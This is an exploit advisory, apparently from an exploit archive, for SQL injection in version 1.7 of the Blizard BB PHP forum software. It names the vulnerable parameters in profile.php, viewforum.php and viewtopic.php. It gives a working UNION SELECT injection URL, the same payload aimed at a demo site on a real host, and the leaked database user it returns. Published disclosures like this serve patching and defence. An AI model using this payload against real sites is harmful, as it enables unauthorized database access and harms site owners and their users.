##########################################
# Exploit Title: Blizard BB 1.7 SQL Injection Vulnerability
# Author: DaOne aka Mocking Bird
# Software Link: http://sourceforge.net/projects/blizard/
# Category: webapps/php
# Version: 1.7
# Google dork: N/A
# Tested on: Apache(CentOS) PHP/5.2.17
##########################################
Vulnerable files:
profile.php 'username' parameter
viewforum.php 'id' parameter
viewtopic.php 'fid, id' parameter
Exploit
http://{host}/blizardbb17/viewforum.php?id=99%27+union+all+select+user%28%29,null,null,null,null,null,null,null,null+and+%271%27=%271
Demo>>http://www.blizardcms.altervista.org/17/viewforum.php?id=99%27+union+all+select+user%28%29,null,null,null,null,null,null,null,null+and+%271%27=%271
result: <a href='viewforum.php?id=blizardcms@localhost'>
//The information contained within this publication is
//supplied "as-is"with no warranties or guarantees of fitness
//of use or otherwise. Bot24, Inc nor Bradley Sean Susser accepts
//responsibility for any damage caused by the use or misuse of
//this information